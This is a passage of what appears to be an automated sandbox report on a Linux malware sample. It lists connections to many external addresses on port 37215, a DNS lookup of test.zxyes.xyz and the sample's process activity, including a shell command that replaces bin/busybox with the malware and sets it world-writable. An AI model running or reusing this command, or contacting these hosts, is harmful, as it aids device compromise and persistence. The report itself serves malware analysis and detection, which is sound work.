                  Mar 20, 2023 16:24:46.207783937 CET4865737215192.168.2.2327.233.42.33
                  Mar 20, 2023 16:24:46.207847118 CET4865737215192.168.2.23197.101.95.145
                  Mar 20, 2023 16:24:46.207856894 CET4865737215192.168.2.23157.242.17.129
                  Mar 20, 2023 16:24:46.207902908 CET4865737215192.168.2.2341.36.237.157
                  Mar 20, 2023 16:24:46.207921028 CET4865737215192.168.2.2341.250.155.229
                  Mar 20, 2023 16:24:46.207937956 CET4865737215192.168.2.23157.49.109.56
                  Mar 20, 2023 16:24:46.207937956 CET4865737215192.168.2.23157.44.109.50
                  Mar 20, 2023 16:24:46.207957983 CET4865737215192.168.2.2341.166.175.84
                  Mar 20, 2023 16:24:46.207989931 CET4865737215192.168.2.23197.197.193.126
                  Mar 20, 2023 16:24:46.208022118 CET4865737215192.168.2.23197.107.138.203
                  Mar 20, 2023 16:24:46.208022118 CET4865737215192.168.2.23197.146.104.254
                  Mar 20, 2023 16:24:46.208118916 CET4865737215192.168.2.23192.249.108.179
                  Mar 20, 2023 16:24:46.208144903 CET4865737215192.168.2.23157.245.51.226
                  Mar 20, 2023 16:24:46.208163977 CET4865737215192.168.2.2341.83.159.7
                  Mar 20, 2023 16:24:46.208178997 CET4865737215192.168.2.23197.8.67.166
                  Mar 20, 2023 16:24:46.208194971 CET4865737215192.168.2.23197.184.27.146
                  Mar 20, 2023 16:24:46.208229065 CET4865737215192.168.2.23197.199.223.14
                  Mar 20, 2023 16:24:46.208256006 CET4865737215192.168.2.2341.39.108.89
                  Mar 20, 2023 16:24:46.208276987 CET4865737215192.168.2.23197.71.2.245
                  Mar 20, 2023 16:24:46.208306074 CET4865737215192.168.2.2341.107.179.6
                  Mar 20, 2023 16:24:46.208317041 CET4865737215192.168.2.2389.178.40.44
                  Mar 20, 2023 16:24:46.208317041 CET4865737215192.168.2.23157.155.222.138
                  Mar 20, 2023 16:24:46.208355904 CET4865737215192.168.2.23197.100.131.123
                  Mar 20, 2023 16:24:46.208405018 CET4865737215192.168.2.23119.74.171.97
                  Mar 20, 2023 16:24:46.208405972 CET4865737215192.168.2.23144.113.192.15
                  Mar 20, 2023 16:24:46.208419085 CET4865737215192.168.2.23157.65.94.47
                  Mar 20, 2023 16:24:46.208465099 CET4865737215192.168.2.2331.109.180.222
                  Mar 20, 2023 16:24:46.208482981 CET4865737215192.168.2.2341.244.140.6
                  Mar 20, 2023 16:24:46.208493948 CET4865737215192.168.2.23157.216.3.85
                  Mar 20, 2023 16:24:46.208501101 CET4865737215192.168.2.23197.62.217.138
                  Mar 20, 2023 16:24:46.208534956 CET4865737215192.168.2.23157.169.120.73
                  Mar 20, 2023 16:24:46.208559990 CET4865737215192.168.2.238.81.35.171
                  Mar 20, 2023 16:24:46.208578110 CET4865737215192.168.2.23197.160.88.131
                  Mar 20, 2023 16:24:46.208710909 CET4865737215192.168.2.23157.242.118.254
                  Mar 20, 2023 16:24:46.208712101 CET4865737215192.168.2.23197.199.33.234
                  Mar 20, 2023 16:24:46.208713055 CET4865737215192.168.2.23197.79.11.2
                  Mar 20, 2023 16:24:46.208714962 CET4865737215192.168.2.23110.17.94.7
                  Mar 20, 2023 16:24:46.208735943 CET4865737215192.168.2.23197.174.229.247
                  Mar 20, 2023 16:24:46.208736897 CET4865737215192.168.2.23197.193.62.108
                  Mar 20, 2023 16:24:46.208741903 CET4865737215192.168.2.23169.249.27.5
                  Mar 20, 2023 16:24:46.208741903 CET4865737215192.168.2.23197.42.135.7
                  Mar 20, 2023 16:24:46.208774090 CET4865737215192.168.2.2341.156.238.30
                  Mar 20, 2023 16:24:46.208818913 CET4865737215192.168.2.2341.72.242.214
                  Mar 20, 2023 16:24:46.208839893 CET4865737215192.168.2.2341.59.219.50
                  Mar 20, 2023 16:24:46.208858967 CET4865737215192.168.2.23157.29.42.32
                  Mar 20, 2023 16:24:46.208887100 CET4865737215192.168.2.23197.205.141.23
                  Mar 20, 2023 16:24:46.208898067 CET4865737215192.168.2.23124.247.197.44
                  Mar 20, 2023 16:24:46.208913088 CET4865737215192.168.2.23197.41.179.16
                  Mar 20, 2023 16:24:46.208954096 CET4865737215192.168.2.2341.58.96.60
                  Mar 20, 2023 16:24:46.208965063 CET4865737215192.168.2.23157.172.63.185
                  Mar 20, 2023 16:24:46.208975077 CET4865737215192.168.2.238.151.202.202
                  Mar 20, 2023 16:24:46.209000111 CET4865737215192.168.2.23157.58.44.99
                  Mar 20, 2023 16:24:46.209041119 CET4865737215192.168.2.23157.136.114.61
                  Mar 20, 2023 16:24:46.209058046 CET4865737215192.168.2.23139.246.9.213
                  Mar 20, 2023 16:24:46.209088087 CET4865737215192.168.2.23157.36.131.139
                  Mar 20, 2023 16:24:46.209110022 CET4865737215192.168.2.23197.179.238.163
                  Mar 20, 2023 16:24:46.209126949 CET4865737215192.168.2.23157.171.120.43
                  Mar 20, 2023 16:24:46.209166050 CET4865737215192.168.2.2341.16.120.81
                  Mar 20, 2023 16:24:46.209192038 CET4865737215192.168.2.2341.45.172.115
                  Mar 20, 2023 16:24:46.209222078 CET4865737215192.168.2.2341.200.143.84
                  Mar 20, 2023 16:24:46.209249020 CET4865737215192.168.2.23157.114.205.33
                  Mar 20, 2023 16:24:46.209283113 CET4865737215192.168.2.2398.207.174.144
                  Mar 20, 2023 16:24:46.209336042 CET4865737215192.168.2.2341.171.182.50
                  Mar 20, 2023 16:24:46.209336042 CET4865737215192.168.2.23197.20.24.8
                  Mar 20, 2023 16:24:46.209353924 CET4865737215192.168.2.23197.139.19.241
                  Mar 20, 2023 16:24:46.210180044 CET4865737215192.168.2.23197.95.123.234
                  Mar 20, 2023 16:24:46.210195065 CET4865737215192.168.2.23157.69.159.155
                  Mar 20, 2023 16:24:46.210202932 CET4865737215192.168.2.2341.92.231.13
                  Mar 20, 2023 16:24:46.210207939 CET4865737215192.168.2.2341.183.241.201
                  Mar 20, 2023 16:24:46.210300922 CET4865737215192.168.2.23211.57.242.70
                  Mar 20, 2023 16:24:46.210333109 CET4865737215192.168.2.23197.241.208.240
                  Mar 20, 2023 16:24:46.210351944 CET4865737215192.168.2.23197.165.27.138
                  Mar 20, 2023 16:24:46.210369110 CET4865737215192.168.2.2341.134.235.78
                  Mar 20, 2023 16:24:46.210441113 CET4865737215192.168.2.2341.6.234.93
                  Mar 20, 2023 16:24:46.210477114 CET4865737215192.168.2.23197.87.147.17
                  Mar 20, 2023 16:24:46.210484028 CET4865737215192.168.2.23157.6.203.1
                  Mar 20, 2023 16:24:46.210478067 CET4865737215192.168.2.2341.118.34.121
                  Mar 20, 2023 16:24:46.210516930 CET4865737215192.168.2.23157.78.189.30
                  Mar 20, 2023 16:24:46.210522890 CET4865737215192.168.2.23157.15.127.236
                  Mar 20, 2023 16:24:46.210555077 CET4865737215192.168.2.2341.131.10.99
                  Mar 20, 2023 16:24:46.210712910 CET4865737215192.168.2.2341.61.64.252
                  Mar 20, 2023 16:24:46.210714102 CET4865737215192.168.2.23157.111.133.122
                  Mar 20, 2023 16:24:46.210726023 CET4865737215192.168.2.2341.16.214.196
                  Mar 20, 2023 16:24:46.210726023 CET4865737215192.168.2.23197.30.228.75
                  Mar 20, 2023 16:24:46.210733891 CET4865737215192.168.2.23157.106.68.220
                  Mar 20, 2023 16:24:46.210755110 CET4865737215192.168.2.2341.24.146.209
                  Mar 20, 2023 16:24:46.210788012 CET4865737215192.168.2.23197.203.174.125

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Mar 20, 2023 16:24:46.162062883 CET192.168.2.238.8.8.80xdcc8Standard query (0)test.zxyes.xyzA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Mar 20, 2023 16:24:46.186434984 CET8.8.8.8192.168.2.230xdcc8No error (0)test.zxyes.xyz195.133.40.202A (IP address)IN (0x0001)false

                  System Behavior

                  General

                  Start time:16:24:45
                  Start date:20/03/2023
                  Path:/tmp/mbl5k2b7z8.elf
                  Arguments:/tmp/mbl5k2b7z8.elf
                  File size:5777432 bytes
                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                  General

                  Start time:16:24:45
                  Start date:20/03/2023
                  Path:/tmp/mbl5k2b7z8.elf
                  Arguments:n/a
                  File size:5777432 bytes
                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                  General

                  Start time:16:24:45
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/mbl5k2b7z8.elf bin/busybox; chmod 777 bin/busybox"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  General

                  Start time:16:24:45
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:n/a
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  General

                  Start time:16:24:45
                  Start date:20/03/2023
                  Path:/usr/bin/rm
                  Arguments:rm -rf bin/busybox
                  File size:72056 bytes
                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                  General

                  Start time:16:24:45
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:n/a
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  General

                  Start time:16:24:45
                  Start date:20/03/2023
                  Path:/usr/bin/mkdir
                  Arguments:mkdir bin
                  File size:88408 bytes
                  MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                  General

                  Start time:16:24:45
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:n/a
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  General

                  Start time:16:24:45
                  Start date:20/03/2023
                  Path:/usr/bin/mv
                  Arguments:mv /tmp/mbl5k2b7z8.elf bin/busybox
                  File size:149888 bytes
                  MD5 hash:504f0590fa482d4da070a702260e3716

                  General

                  Start time:16:24:45
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:n/a
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  General

                  Start time:16:24:45
                  Start date:20/03/2023
                  Path:/usr/bin/chmod
                  Arguments:chmod 777 bin/busybox
                  File size:63864 bytes
                  MD5 hash:739483b900c045ae1374d6f53a86a279

                  General

                  Start time:16:24:45
                  Start date:20/03/2023
                  Path:/tmp/mbl5k2b7z8.elf
                  Arguments:n/a
                  File size:5777432 bytes
                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                  General

                  Start time:16:24:45
                  Start date:20/03/2023
                  Path:/tmp/mbl5k2b7z8.elf
                  Arguments:n/a
                  File size:5777432 bytes
                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                  General

                  Start time:16:24:45
                  Start date:20/03/2023
                  Path:/tmp/mbl5k2b7z8.elf
                  Arguments:n/a
                  File size:5777432 bytes
                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c